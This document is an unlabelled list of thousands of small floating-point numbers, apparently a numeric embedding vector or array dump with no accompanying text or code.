0.009674875997006893, 0.002972689224407077, -0.006756731774657965, 0.03921768069267273, 0.003127800766378641, -0.02479059062898159, 0.005382885690778494, 0.0017812271835282445, 0.0035385910887271166, 0.00624196557328105, -0.0012579384492710233, -0.0027817825321108103, -0.013745278120040894, 0.0038965409621596336, -0.0035692723467946053, -0.013847549445927143, 0.01032259501516819, 0.008590798825025558, 0.0006967240478843451, -0.002028383081778884, 0.011283946223556995, 0.014822537079453468, 0.014222544617950916, -0.003841996192932129, -0.017563411965966225, -0.0007470074924640357, -0.008038532920181751, 0.02702692709863186, 0.008427164517343044, -0.014767992310225964, -0.000041174898797180504, 0.02087700553238392, 0.0379631482064724, 0.014754355885088444, -0.016922511160373688, 0.029072355479002, 0.0023011069279164076, 0.01441345177590847, -0.01820431277155876, 0.0027442830614745617, 0.0245587769895792, 0.003034051973372698, 0.012797563336789608, -0.006088558118790388, 0.017399776726961136, -0.013738459907472134, 0.002193721942603588, 0.006037422455847263, 0.0133566465228796, 0.010397594422101974, -0.02075427956879139, -0.014563449658453465, 0.011024858802556992, -0.023249702528119087, 0.009954418055713177, 0.03286321461200714, 0.005423794034868479, 0.007977170869708061, 0.006259010639041662, -0.019363388419151306, 0.027217833325266838, 0.00418630987405777, -0.005079480353742838, -0.009511241689324379, 0.009947599843144417, 0.004394261632114649, -0.017658865079283714, 0.0013908912660554051, -0.003640862414613366, -0.011283946223556995, -0.017822498455643654, -0.004459033720195293, 0.0034346149768680334, -0.006323782727122307, 0.006855593994259834, 0.012020300142467022, -0.03447228670120239, -0.008515800349414349, -0.022267896682024002, -0.00046874399413354695, -0.02443605102598667, -0.0075339945033192635, -0.009756692685186863, 0.03362684324383736, -0.009149882942438126, 0.002759623806923628, -0.008570345118641853, -0.013056650757789612, -0.022022444754838943, 0.015708889812231064, 0.012299842201173306, -0.004394261632114649, -0.00668855058029294, 0.00941578857600689, 0.016186155378818512, 0.014754355885088444, 0.013158922083675861, 0.0010636227671056986, -0.01152939721941948, -0.023099703714251518, -0.013527099043130875, -0.0008509834297001362, 0.001958497567102313, -0.004885164555162191, 0.0046328953467309475, -0.02663147635757923, 0.0005629188963212073, -0.014904354698956013, 0.040226757526397705, 0.01859976164996624, -0.018190676346421242, -0.01847703568637371, -0.011720304377377033, 0.01347937248647213, 0.014795265160501003, 0.01338391937315464, -0.0011343604419380426, 0.004431761335581541, 0.025745123624801636, 0.012845289893448353, -0.028145093470811844, 0.015667980536818504, -0.006361281964927912, -0.011890756897628307, 0.006559006869792938, 0.021163364872336388, -0.004602213855832815, -0.004159037489444017, -0.0037533610593527555, 0.004353353288024664, -0.01669069565832615, -0.03905404359102249, 0.020195195451378822, 0.002031792188063264, 0.031826864928007126, 0.014331634156405926, -0.009068065322935581, 0.016963418573141098, 0.0046669854782521725, -0.007902171462774277, -0.0066237784922122955, -0.009681694209575653, -0.013561190105974674, 0.0032965487334877253, -0.01358846202492714, -0.0022124715615063906, -0.002031792188063264, -0.011679396033287048, 0.0007180305547080934, 0.0020624734461307526, 0.0041556283831596375, -0.0028601905796676874, 0.01245665829628706, 0.03864495828747749, -0.019758837297558784, -0.012906652875244617, 0.009606694802641869, -0.014086183160543442, -0.019458841532468796, -0.010581682436168194, -0.007868081331253052, 0.013561190105974674, -0.0028891675174236298, 0.014917990192770958, 0.0076499017886817455, 0.003913586027920246, -0.013008924201130867, 0.01236120518296957, 0.007465813308954239, -0.0027118970174342394, 0.0017539547989144921, -0.022090625017881393, 0.012408931739628315, 0.011713486164808273, 0.0020829278510063887, 0.0037329066544771194, -0.010281686671078205, -0.005931742023676634, 0.02244516648352146, -0.01135212741792202, 0.027599645778536797, -0.011911210604012012, 0.017399776726961136, -0.0013943002559244633, -0.00040951179107651114, -0.00816807709634304, 0.00020113377831876278, 0.017195234075188637, -0.016063431277871132, -0.015122533775866032, 0.0023505380377173424, -0.006109012756496668, -0.036135900765657425, 0.026208754628896713, -0.014181636273860931, -0.006388554349541664, 0.017399776726961136, 0.010649863630533218, -0.000034703036362770945, 0.02260880172252655, 0.013104377314448357, 0.01686796545982361, -0.019677020609378815, -0.011618033051490784, 0.005420384928584099, -0.002405082806944847, -0.01636342704296112, 0.027845097705721855, 0.010002144612371922, 0.01132485456764698, 0.002824395662173629, 0.016963418573141098, 0.02923598885536194, -0.002190312836319208, 0.015463437885046005, 0.0003319559618830681, 0.01235438697040081, -0.017713408917188644, 0.006184011697769165, -0.0113384909927845, 0.0113384909927845, -0.007043091580271721, 0.001961906673386693, 0.011311219073832035, -0.011829393915832043, -0.0036715439055114985, -0.014358907006680965, 0.005747653543949127, -0.006422644946724176, 0.01542252954095602, 0.006579461041837931, 0.011672577820718288, -0.010813497938215733, 0.021163364872336388, 0.0029522348195314407, 0.0026761020999401808, -0.01041122991591692, -0.0017292392440140247, 0.004994254093617201, 0.02056337334215641, -0.0020727007649838924, -0.017836134880781174, 0.002534626517444849, 0.005645382218062878, 0.015490710735321045, 0.022076990455389023, -0.01033623144030571, -0.0017744090873748064, 0.009463515132665634, -0.013554371893405914, 0.013874822296202183, 0.004159037489444017, 0.020113378763198853, 0.004111310932785273, -0.03935404121875763, -0.012170298956334591, -0.014099819585680962, 0.0332450270652771, -0.015763433650135994, -0.003276094328612089, 0.01033623144030571, -0.016949782148003578, -0.008693070150911808, -0.006426054053008556, -0.007063545752316713, -0.0015033897943794727, -0.009852146729826927, 0.006773776840418577, 0.01844976283609867, 0.002249971264973283, 0.007983988150954247, -0.01124985609203577, -0.007683992385864258, -0.012865744531154633, -0.02689056470990181, -0.01835430972278118, 0.012654383666813374, 0.014904354698956013, 0.0186406709253788, 0.0025141723453998566, 0.01671796664595604, -0.000027259060516371392, -0.005587428342550993, 0.012129389680922031, -0.0049669817090034485, -0.015054352581501007, -0.0041522192768752575, 0.017440686002373695, 0.01873612403869629, 0.015067989006638527, -0.001018452807329595, -0.00771808298304677, -0.005461293738335371, 0.005805607419461012, -0.007097636349499226, 0.017345232889056206, -0.007486267480999231, 0.007833990268409252, -0.007868081331253052, 0.013247556984424591, -0.01050668302923441, 0.004977209027856588, -0.005072662141174078, -0.0135952802374959, -0.0021988353691995144, 0.030245067551732063, -0.019158845767378807, 0.006971501745283604, 0.023808784782886505, -0.012790745124220848, -0.012081663124263287, 0.02284061536192894, -0.0035010913852602243, 0.013302101753652096, -0.0013337896671146154, 0.010002144612371922, -0.02457241155207157, -0.004588577430695295, 0.007833990268409252, 0.011311219073832035, 0.034390468150377274, 0.02488604374229908, -0.006974910385906696, -0.01829976588487625, -0.007636265829205513, -0.009613513015210629, 0.002977802651003003, 0.02270425483584404, -0.026345117017626762, -0.0006477189599536359, -0.006855593994259834, -0.009368062019348145, 0.01876339502632618, -0.018245220184326172, -0.011979391798377037, -0.01132485456764698, -0.018040677532553673, -0.017577046528458595, -0.003364729695022106, 0.006603324320167303, 0.008624889887869358, -0.04311762750148773, -0.0011744167422875762, -0.02303152345120907, 0.011693031527101994, 0.008849886246025562, -0.013561190105974674, 0.019049756228923798, -0.0003860745928250253, -0.00623855646699667, -0.01249074935913086, -0.002556785475462675, 0.029754163697361946, 0.011079403571784496, 0.02674056589603424, -0.011018040589988232, 0.00019623327534645796, 0.0365995317697525, 0.003335752757266164, 0.021408816799521446, -0.006814685184508562, -0.027872370555996895, 0.02277243509888649, -0.01869521476328373, 0.013738459907472134, 0.01645888015627861, -0.009968054480850697, 0.011788485571742058, -0.015258895233273506, 0.02716328762471676, -0.016131611540913582, 0.002988029969856143, -0.02031792141497135, -0.01632251776754856, -0.02251334860920906, 0.001442879205569625, 0.0013491304125636816, -0.00020923027477692813, -0.0045476690866053104, -0.024217871949076653, 0.006981728598475456, -0.001592877320945263, -0.0016380471643060446, -0.0032522310502827168, -0.025158768519759178, 0.0012050982331857085, 0.019404295831918716, -0.014058910310268402, -0.005863561294972897, -0.000049564350774744526, -0.014590722508728504, 0.0068044583313167095, -0.021995171904563904, 0.009579422883689404, 0.011379399336874485, -0.01358846202492714, -0.01146121695637703, 0.0019959970377385616, 0.031690504401922226, 0.010854406282305717, -0.008665798231959343, -0.010833951644599438, 0.024272415786981583, -0.014154364354908466, 0.0024221281055361032, -0.010015781037509441, -0.002454513916745782, 0.0062044658698141575, 0.003579499665647745, 0.002735760295763612, -0.026099665090441704, -0.03174504637718201, -0.021272454410791397, -0.030108705163002014, 0.008952157571911812, -0.027749644592404366, -0.01020668726414442, 0.01554525550454855, 0.0023607651237398386, 0.016963418573141098, -0.0018920211587101221, -0.004861301276832819, -0.005035162903368473, 0.0049635726027190685, -0.013349829241633415, -0.018067950382828712, -0.009906691499054432, 0.015477074310183525, 0.014645266346633434, 0.0065965065732598305, 0.005457884632050991, -0.006773776840418577, 0.006248783320188522, -0.03125414624810219, 0.011604396626353264, -0.03449955955147743, 0.019663384184241295, -0.010145324282348156, 0.02048155479133129, 0.0009698739158920944, 0.00034431376843713224, 0.014808900654315948, 0.004319262690842152, -0.01132485456764698, 0.006351055111736059, -0.0013619143282994628, 0.027736008167266846, -0.0020641779992729425, -0.014972534961998463, 0.027436012402176857, -0.0007832286064513028, 0.0017675909912213683, -0.0054749296978116035, -0.0003598675539251417, 0.009074883535504341, -0.00678741279989481, 0.00827716663479805, 0.019772473722696304, 0.021177001297473907, -0.016036158427596092, -0.02871781401336193, 0.014263453893363476, 0.0011062357807531953, -0.025745123624801636, -0.013915730640292168, 0.002313038567081094, -0.00001544724545965437, 0.021476997062563896, -0.014140727929770947, 0.026236027479171753, 0.005519247613847256, 0.008215803653001785, 0.010772589594125748, -0.011965755373239517, -0.006528325378894806, 0.012115754187107086, -0.008672616444528103, -0.008631707169115543, 0.00334257073700428, -0.00020411670266184956, 0.012783926911652088, -0.00815444067120552, -0.006102194543927908, 0.002706783590838313, -0.023876966908574104, 0.005321522708982229, -0.011270309798419476, 0.01849067211151123, 0.0024272415321320295, -0.004864710383117199, -0.014945263043045998, -0.005437430460005999, -0.003131209872663021, 0.0016849215608090162, 0.025663306936621666, -0.0012085072230547667, 0.007486267480999231, 0.03545409068465233, 0.012054391205310822, -0.01336346473544836, 0.007908989675343037, -0.002752805594354868, -0.000689053675159812, 0.01626797392964363, -0.020181559026241302, 0.017208870500326157, 0.003213027026504278, 0.008058987557888031, -0.010888496413826942, -0.005491975229233503, -0.017727045342326164, 0.0009212950244545937, -0.011645304970443249, -0.0248996801674366, 0.021395180374383926, 0.004271536134183407, -0.009940781630575657, 0.012033936567604542, -0.02299061417579651, -0.0008573753875680268, -0.032399583607912064, 0.0008548186160624027, -0.011502125300467014, -0.007574902847409248, -0.01051350124180317, 0.01669069565832615, -0.007009000983089209, -0.006709004752337933, 0.005164706613868475, -0.029072355479002, -0.01629524491727352, -0.009749875403940678, -0.008781705982983112, -0.00771808298304677, 0.0009323743870481849, 0.017386140301823616, -0.011481670662760735, -0.006351055111736059, -0.000766609504353255, 0.01673160307109356, 0.012095299549400806, 0.01840885542333126, -0.003361320588737726, 0.0020164514426141977, -0.0074453591369092464, 0.015081624500453472, -0.005338567774742842, -0.008583980612456799, -0.021476997062563896, -0.0024851954076439142, -0.029072355479002, 0.014999807812273502, -0.00828398484736681, 0.002471559215337038, 0.01441345177590847, -0.011154402047395706, 0.001374698244035244, -0.007070363964885473, -0.01429072581231594, -0.0016917396569624543, -0.001311630941927433, 0.012933924794197083, 0.014877081848680973, 0.001093451865017414, 0.007697628811001778, 0.008099895901978016, -0.013690733350813389, -0.017181597650051117, -0.012858926318585873, -0.01656796969473362, 0.004264717921614647, 0.008556708693504333, -0.011290764436125755, 0.0188452135771513, 0.01134530920535326, -0.002186903730034828, -0.010936223901808262, 0.016022522002458572, -0.024190599098801613, 0.0031431415118277073, -0.014849809929728508, -0.014972534961998463, 0.014018001966178417, -0.009579422883689404, -0.009647603146731853, -0.0019022483611479402, 0.006562415976077318, 0.005399930756539106, 0.0018425900489091873, -0.00930669903755188, -0.004213582258671522, -0.0006409008638001978, 0.01146121695637703, 0.021667903289198875, 0.010956677608191967, -0.023767877370119095, 0.02056337334215641, -0.003265867242589593, 0.01851794496178627, -0.025636034086346626, 0.01825885660946369, 0.014167999848723412, 0.0023675833363085985, -0.009579422883689404, 0.011263491585850716, -0.009340789169073105, 0.006889684591442347, -0.011904392391443253, -0.0053897034376859665, -0.0007176044164225459, -0.021613359451293945, -0.002822691109031439, -0.0043294900096952915, -0.007765809539705515, -0.007009000983089209, -0.018054313957691193, -0.01663614995777607, 0.019704293459653854, 0.01632251776754856, -0.017536139115691185, 0.019977016374468803, 0.012886198237538338, 0.003484046319499612, 0.002909621689468622, -0.01135212741792202, -0.019336115568876266, -0.014440723694860935, 0.0010499865747988224, -0.010772589594125748, 0.028308728709816933, -0.017399776726961136, 0.012320296838879585, 0.0028107594698667526, 0.012129389680922031, -0.010486229322850704, -0.0015869115013629198, 0.008488527499139309, -0.017590682953596115, -0.01649978756904602, -0.011829393915832043, -0.0035215457901358604, -0.0018289538566023111, -0.002534626517444849, -0.001743727596476674, -0.00836580153554678, 0.012306660413742065, 0.013199830427765846, -0.0022175852209329605, 0.006947638001292944, 0.021954264491796494, 0.01131803635507822, -0.012954379431903362, 0.014345270581543446, -0.0023812195286154747, 0.008999885059893131, 0.01670433208346367, -0.013936185277998447, -0.006906729657202959, -0.00829080305993557, 0.029972342774271965, 0.016008885577321053, 0.013165740296244621, -0.028363272547721863, 0.013868004083633423, 0.010186232626438141, 0.01628161035478115, 0.00005853973198099993, -0.021667903289198875, 0.003576090559363365, 0.014440723694860935, 0.022295169532299042, 0.006368100177496672, 0.00521243317052722, -0.007629447616636753, -0.015777070075273514, -0.006337418686598539, -0.01658160611987114, -0.005931742023676634, 0.004247672855854034, -0.021776992827653885, 0.027926914393901825, -0.012981651350855827, -0.01885885000228882, 0.001978951971977949, -0.016131611540913582, 0.007472631521522999, -0.019827019423246384, -0.010929405689239502, -0.010472592897713184, -0.004735166672617197, -0.010820316150784492, 0.012068026699125767, -0.012668019160628319, 0.01032941322773695, -0.009920326992869377, -0.0029368940740823746, -0.012729382142424583, -0.024326961487531662, -0.001518730539828539, 0.023426972329616547, -0.003760179039090872, 0.02480422705411911, 0.021381543949246407, 0.002752805594354868, 0.015381621196866035, 0.014072546735405922, 0.0005607882631011307, 0.01885885000228882, 0.0050556170754134655, -0.014577086083590984, -0.009265790693461895, -0.0045408508740365505, -0.0077794454991817474, -0.014072546735405922, 0.014686175622045994, 0.003056210931390524, -0.000012158046956756152, 0.0032096179202198982, -0.010070325806736946, -0.00041888668783940375, 0.009736238978803158, -0.009947599843144417, 0.004684031009674072, 0.012783926911652088, -0.0004870676202699542, -0.0189815741032362, 0.004782893229275942, 0.023972420021891594, -0.00024864738225005567, -0.0063306004740297794, -0.030272338539361954, 0.0021545179188251495, -0.031663231551647186, -0.00005736787352361716, -0.006899911444634199, 0.0065010529942810535, -0.0187770314514637, -0.00930669903755188, -0.0038692685775458813, 0.019567931070923805, 0.017958860844373703, -0.006828321609646082, -0.017290687188506126, 0.006957865320146084, 0.0008778296760283411, 0.02923598885536194, -0.021381543949246407, 0.0021476997062563896, -0.013888458721339703, 0.02683601900935173, -0.0050590261816978455, -0.024367868900299072, 0.013458918780088425, 0.0008173190872184932, 0.0072339982725679874, 0.01041122991591692, -0.017931587994098663, -0.007888535037636757, 0.008495345711708069, -0.02035883069038391, 0.002701669931411743, 0.028472362086176872, 0.026181481778621674, 0.0022312214132398367, -0.019090663641691208, 0.002091450383886695, -0.019199753180146217, -0.01621342822909355, 0.002539740176871419, -0.03504500538110733, -0.017331596463918686, -0.015067989006638527, -0.007629447616636753, -0.01441345177590847, -0.004735166672617197, 0.0025601943489164114, 0.0008991361828520894, -0.006828321609646082, 0.008768069557845592, -0.0020181559957563877, -0.02301788702607155, 0.01880430430173874, 0.017549775540828705, 0.008556708693504333, 0.030599607154726982, 0.014004365541040897, 0.014699811115860939, 0.014018001966178417, 0.017699772492051125, 0.00940897036343813, 0.008999885059893131, 0.02695874497294426, -0.02305879443883896, 0.0071385446935892105, 0.003276094328612089, 0.019908836111426353, -0.019472477957606316, -0.007561266887933016, -0.01853158138692379, -0.01450890488922596, -0.0189815741032362, 0.014536177739501, 0.0165543332695961, 0.010390776209533215, 0.013431645929813385, -0.0003562454367056489, -0.01660887710750103, 0.00003009549436683301, 0.012497566640377045, -0.01245665829628706, -0.010949859395623207, -0.006671505514532328, -0.00929988082498312, 0.013888458721339703, -0.014236181043088436, 0.004868119489401579, -0.009538514539599419, 0.034254107624292374, 0.021654268726706505, 0.006003332324326038, -0.019936108961701393, 0.031963225454092026, -0.006709004752337933, -0.013854367658495903, -0.005130616016685963, 0.014699811115860939, 0.014154364354908466, 0.00838625617325306, 0.007281724829226732, -0.017167961224913597, 0.004469261039048433, -0.011958937160670757, 0.0001950614241650328, 0.021299727261066437, -0.00942260678857565, 0.0029300760943442583, 0.010138506069779396, 0.003910176921635866, 0.0010022599017247558, 0.01033623144030571, 0.03329957276582718, -0.007581721059978008, -0.009531696327030659, -0.027436012402176857, 0.005849924869835377, -0.01034304965287447, -0.00808626040816307, 0.000288064475171268, -0.00261133024469018, -0.011911210604012012, -0.02249971218407154, -0.011011222377419472, 0.028117820620536804, -0.006057877093553543, 0.00846807286143303, -0.0093203354626894, 0.015013444237411022, -0.004568123258650303, 0.009572604671120644, 0.009756692685186863, -0.021586086601018906, -0.007479449734091759, -0.01041804812848568, 0.015790706500411034, 0.013977093622088432, 0.007629447616636753, -0.005277205258607864, -0.014358907006680965, 0.008727161213755608, -0.008140805177390575, -0.01146803516894579, 0.0068044583313167095, 0.003197686281055212, -0.004707894288003445, -0.023236066102981567, 0.0011275423457846045, 0.0005539701669476926, 0.0017573637887835503, 0.0094907870516181, -0.004271536134183407, 0.016990691423416138, 0.006051058880984783, -0.0029249624349176884, 0.013056650757789612, 0.036054082214832306, -0.01615888439118862, -0.008822614327073097, 0.006869229953736067, -0.009777147322893143, 0.0031516640447080135, -0.0011769735720008612, -0.021776992827653885, 0.009756692685186863, 0.01339755579829216, 0.013193013146519661, -0.005198797211050987, 0.02244516648352146, -0.012831653468310833, -0.020263375714421272, -0.010861224494874477, -0.002255084691569209, 0.022063354030251503, -0.006876048166304827, -0.017972497269511223, -0.0034209787845611572, 0.012388477101922035, -0.012122571468353271, 0.029726890847086906, -0.0032965487334877253, -0.011297582648694515, 0.010261232033371925, 0.019486114382743835, -0.011645304970443249, -0.011195311322808266, 0.007793081924319267, -0.003709043376147747, 0.009899873286485672, -0.00838625617325306, -0.003995403181761503, 0.04330853745341301, -0.023617878556251526, 0.014086183160543442, -0.005069253034889698, -0.008624889887869358, -0.004994254093617201, -0.007840808480978012, -0.022281533107161522, 0.003364729695022106, -0.0032539356034249067, -0.01032259501516819, 0.005451066419482231, 0.015967976301908493, 0.0022670163307338953, -0.020031562075018883, 0.01685432903468609, -0.00919760949909687, 0.014277089387178421, 0.0013303806772455573, -0.023467881605029106, 0.023195156827569008, 0.007077182177454233, 0.015954341739416122, -0.02084973268210888, -0.006354464218020439, 0.004922664258629084, -0.012224843725562096, -0.002817577449604869, -0.006494234781712294, -0.0025959894992411137, -0.022213350981473923, 0.00203690561465919, -0.005526065360754728, -0.015095260925590992, -0.017522502690553665, 0.027395103126764297, -0.0025636034552007914, 0.001965315779671073, 0.013724824413657188, 0.001231518341228366, -0.011938483454287052, 0.0027118970174342394, 0.0019090664573013783, 0.01656796969473362, -0.005628337152302265, -0.015613435767591, -0.03354502469301224, 0.0002021991094807163, 0.0007627743179909885, -0.015831615775823593, 0.023454245179891586, 0.005065843928605318, -0.00624196557328105, 0.009477151557803154, -0.00622832914814353, -0.017686136066913605, 0.007602175232023001, -0.003647680627182126, 0.008802159689366817, -0.021599723026156425, 0.01449526846408844, -0.016881601884961128, 0.011140766553580761, 0.0033118892461061478, 0.008638525381684303, -0.002243153052404523, 0.017440686002373695, -0.004295399412512779, 0.005338567774742842, -0.024272415786981583, -0.00567265460267663, -0.001820431207306683, 0.0005100786802358925, 0.008856704458594322, 0.01123621966689825, -0.0034499557223170996, -0.015777070075273514, 0.005624928046017885, -0.009995326399803162, 0.017017964273691177, -0.012845289893448353, -0.003787451423704624, 0.00005300003249431029, -0.004605622962117195, 0.005154479295015335, -0.012163480743765831, -0.014658902771770954, -0.012518021278083324, 0.030463246628642082, 0.011208946816623211, 0.008638525381684303, -0.021872447803616524, 0.003910176921635866, -0.0013533917954191566, -0.013772550970315933, 0.017277050763368607, 0.006722641177475452, -0.008140805177390575, -0.006651050876826048, 0.005560155957937241, -0.011856665834784508, 0.007786263711750507, -0.011665759608149529, -0.010547592304646969, 0.007861263118684292, -0.004298808518797159, 0.004591986536979675, -0.009470333345234394, 0.021067911759018898, -0.021640632301568985, 0.010029416531324387, -0.03504500538110733, 0.009258972480893135, -0.009681694209575653, 0.014863445423543453, -0.021067911759018898, -0.008761251345276833, -0.003702225163578987, 0.0036169991362839937, -0.007479449734091759, -0.01121576502919197, 0.012620292603969574, -0.003030642867088318, 0.00045382941607385874, -0.013649825006723404, -0.009586241096258163, -0.007186271715909243, -0.0005965832388028502, -0.011727122589945793, -0.03316321223974228, 0.0021647450048476458, 0.0029351897537708282, -0.010704408399760723, 0.007186271715909243, -0.027899641543626785, -0.015081624500453472, 0.01430436223745346, -0.00927942618727684, -0.0206588264554739, 0.015313440002501011, -0.004060175269842148, 0.009974871762096882, 0.0025107632391154766, -0.000040482434997102246, 0.0010022599017247558, 0.0077794454991817474, 0.0015366279985755682, -0.00420335540547967, -0.0324268564581871, -0.0033170029055327177, 0.0035147275775671005, -0.0014991285279393196, -0.0006089410744607449, -0.01340437401086092, -0.004005630500614643, 0.0074385409243404865, -0.011754394508898258, 0.00771808298304677, 0.0029300760943442583, 0.00010541413212195039, -0.013186194933950901, -0.0008075180812738836, 0.0017036712961271405, -0.0002656926226336509, -0.012027118355035782, -0.00826353020966053, 0.03100869432091713, -0.004776075016707182, 0.01339755579829216, 0.00020060112001374364, 0.03559045121073723, -0.000621724990196526, 0.00474539352580905, -0.011897575110197067, 0.01861339807510376, 0.029754163697361946, 0.011883938685059547, 0.010104415938258171, -0.0008045351132750511, 0.0008237110450863838, 0.01879066787660122, 0.0034005246125161648, -0.0011011222377419472, 0.00835898332297802, -0.008699888363480568, 0.012688473798334599, 0.0052158422768116, 0.03335411846637726, -0.002108495682477951, 0.007772627752274275, 0.01828612945973873, -0.028199639171361923, -0.0038113147020339966, -0.010049871169030666, -0.005304477643221617, -0.01236120518296957, -0.007029455155134201, 0.004513578489422798, 0.020263375714421272, -0.002313038567081094, 0.0007124908734112978, -0.005737426225095987, -0.012599838897585869, -0.011924847029149532, 0.012722563929855824, 0.026181481778621674, 0.011863484047353268, 0.012122571468353271, -0.008222621865570545, 0.001961906673386693, -0.001449697301723063, 0.0009775442304089665, -0.00076575722778216, -0.004612440709024668, -0.012797563336789608, 0.001955088460817933, -0.02282698079943657, 0.00038096102070994675, 0.004264717921614647, 0.011638486757874489, -0.004718121141195297, -0.015940705314278603, 0.04532669112086296, 0.006749913562089205, -0.010854406282305717, -0.010070325806736946, 0.003545409068465233, 0.009449878707528114, -0.00018930865917354822, 0.003930631559342146, -0.012736200354993343, -0.018177039921283722, -0.007847626693546772, -0.006044240668416023, 0.01662251353263855, -0.023495152592658997, 0.008590798825025558, -0.004305626731365919, 0.0019380433950573206, 0.011168038472533226, -0.0014684470370411873, 0.008427164517343044, 0.019063392654061317, 0.0025175814516842365, 0.016922511160373688, 0.006845366675406694, 0.01647251658141613, 0.010383957996964455, 0.004718121141195297, 0.03935404121875763, 0.030190521851181984, 0.0013712892541661859, 0.02858145162463188, 0.014781628735363483, -0.027517829090356827, 0.021695176139473915, 0.007670356426388025, 0.000013496364772436209, -0.005396521650254726, -0.01245665829628706, 0.015504347160458565, -0.022676981985569, 0.0006558154709637165, -0.009524878114461899, 0.0003498534788377583, 0.023713331669569016, -0.017577046528458595, -0.00511016184464097, -0.008624889887869358, -0.007322633173316717, 0.029835980385541916, -0.004707894288003445, 0.017767954617738724, -0.015217986889183521, 0.0011940187541767955, 0.00046235203626565635, 0.01865430548787117, 0.018163403496146202, -0.0032198450062423944, 0.005396521650254726, 0.004254491068422794, 0.012422568164765835, -0.003998812288045883, 0.00920442771166563, 0.01876339502632618, -0.010861224494874477, -0.012838471680879593, -0.015695253387093544, -0.005168115720152855, 0.005515838507562876, -0.015899796038866043, -0.015845252200961113, 0.017113417387008667, -0.01879066787660122, 0.004445397760719061, 0.003974949009716511, -0.008815796114504337, 0.010868042707443237, 0.00623514736071229, 0.012681655585765839, -0.016922511160373688, -0.01835430972278118, 0.010118052363395691, -0.02270425483584404, -0.009020338766276836, -0.061253760010004044, 0.0006400485872291028, 0.006606733426451683, 0.00917033664882183, 0.003277798881754279, -0.007983988150954247, 0.001895430264994502, -0.014890718273818493, -0.015490710735321045, -0.013643006794154644, 0.004789711441844702, 0.02101336605846882, -0.0011300991754978895, 0.025486037135124207, -0.012804381549358368, -0.01641797088086605, -0.009524878114461899, 0.01644524373114109, 0.005260159727185965, 0.010111234150826931, 0.011133948341012001, 0.00918397307395935, 0.010752134956419468, -0.01135894563049078, 0.003770406125113368, -0.02278607152402401, 0.017195234075188637, 0.005362431053072214, -0.008502163924276829, -0.013063468970358372, -0.011202129535377026, -0.014699811115860939, -0.004387443885207176, -0.015367984771728516, 0.009681694209575653, 0.01431799866259098, -0.009695330634713173, -0.03370865806937218, -0.01637706346809864, -0.00038032184238545597, 0.02694510854780674, 0.005836288910359144, 0.02273152768611908, -0.007922626100480556, 0.0040294937789440155, -0.001601399970240891, -0.014536177739501, -0.00771126477047801, -0.03294503316283226, 0.009136246517300606, -0.0005364987882785499, -0.00679082190617919, -0.0030187112279236317, -0.013772550970315933, 0.013322556391358376, 0.002336901845410466, -0.008618071675300598, -0.00839307438582182, 0.018231583759188652, -0.006299919448792934, 0.008345347829163074, 0.0030425747390836477, 0.009824873879551888, 0.01859976164996624, 0.015967976301908493, -0.01442708820104599, -0.007090818136930466, 0.007281724829226732, -0.007765809539705515, -0.012306660413742065, 0.011774849146604538, 0.008508982136845589, -0.002115313895046711, 0.0038999500684440136, -0.019036119803786278, -0.0013653234345838428, 0.011181674897670746, -0.00037201226223260164, 0.008324893191456795, 0.006855593994259834, -0.00010291061335010454, -0.010158960707485676, 0.010254413820803165, 0.001097713247872889, -0.013077105395495892, 0.0020198605488985777, 0.013758914545178413, -0.0011479966342449188, -0.02104063890874386, 0.0063783274963498116, 0.013683915138244629, -0.0025601943489164114, 0.01861339807510376, -0.01846339926123619, 0.04546305537223816, -0.007302179001271725, 0.00816807709634304, -0.021613359451293945, -0.009374880231916904, -0.015940705314278603, -0.004619258921593428, -0.010152142494916916, 0.000795160245615989, 0.006016968283802271, 0.01442708820104599, 0.005314704496413469, 0.017058871686458588, -0.0009016930125653744, 0.00102441874332726, -0.009115791879594326, 0.014331634156405926, 0.0038044967222958803, -0.03253594785928726, -0.025322401896119118, -0.0047522117383778095, -0.01430436223745346, 0.007295361254364252, -0.003325525438413024, -0.016022522002458572, 0.006374918390065432, -0.015667980536818504, 0.003705634269863367, 0.0067158229649066925, -0.04153583198785782, 0.010915769264101982, 0.013015742413699627, 0.023113340139389038, 0.004578350577503443, 0.003478932660073042, 0.008679433725774288, -0.023863330483436584, 0.02270425483584404, -0.006978319492191076, -0.017236143350601196, 0.014372543431818485, -0.008740796707570553, 0.011174856685101986, -0.021804265677928925, -0.028090549632906914, 0.01227257028222084, 0.007677174173295498, -0.014454360119998455, 0.013158922083675861, 0.006576051935553551, -0.003913586027920246, 0.02474968321621418, -0.023576971143484116, 0.004789711441844702, -0.019554294645786285, 0.025581490248441696, 0.01660887710750103, 0.018122494220733643, 0.0018596352310851216, 0.013329374603927135, 0.02087700553238392, -0.008133986964821815, 0.0037329066544771194, -0.000037819118006154895, -0.0287996307015419, 0.013336192816495895, -0.003477228106930852, -0.0005688847741112113, 0.005041980650275946, 0.013745278120040894, -0.01654069684445858, -0.0009997030720114708, 0.00017876191122923046, 0.019527021795511246, -0.01135212741792202, -0.01358846202492714, 0.0055703832767903805, 0.02263607271015644, -0.0018494081450626254, 0.014331634156405926, 0.02502240613102913, 0.01626797392964363, 0.024367868900299072, -0.015817979350686073, -0.0009340789401903749, -0.007206725887954235, -0.008733978495001793, 0.014072546735405922, 0.010240777395665646, 0.023822421208024025, 0.03114505484700203, 0.01664978638291359, 0.01656796969473362, -0.002636898076161742, -0.008515800349414349, 0.012006664648652077, -0.010786225087940693, 0.010649863630533218, 0.007840808480978012, -0.0078067178837955, 0.0034635919146239758, 0.02918144501745701, 0.013936185277998447, -0.003545409068465233, 0.027504192665219307, -0.002534626517444849, -0.010349866934120655, -0.03469046577811241, -0.0046669854782521725, 0.010622590780258179, 0.013554371893405914, 0.019704293459653854, -0.00940215215086937, -0.019458841532468796, -0.0024187189992517233, -0.004690848756581545, 0.009831692092120647, -0.003794269636273384, 0.007493085693567991, 0.00611923960968852, -0.009054429829120636, 0.028008731082081795, 0.0013917435426265001, -0.006449917331337929, 0.015831615775823593, 0.012872561812400818, 0.03155414015054703, -0.006299919448792934, 0.015217986889183521, -0.0004169690946582705, 0.0020795187447220087, -0.009558968245983124, 0.021095184609293938, 0.025758760049939156, 0.009579422883689404, 0.01225211564451456, -0.007043091580271721, 0.025854213163256645, 0.0007755582337267697, -0.0003325951693113893, 0.007772627752274275, 0.023740604519844055, 0.0011411785380914807, -0.00827716663479805, -0.0016031044069677591, -0.00013849254173692316, -0.004411307163536549, -0.012095299549400806, 0.006749913562089205, -0.01233393233269453, 0.008843068033456802, -0.010261232033371925, 0.010186232626438141, -0.004786302335560322, -0.007888535037636757, 0.025758760049939156, -0.0010712931398302317, 0.00815444067120552, 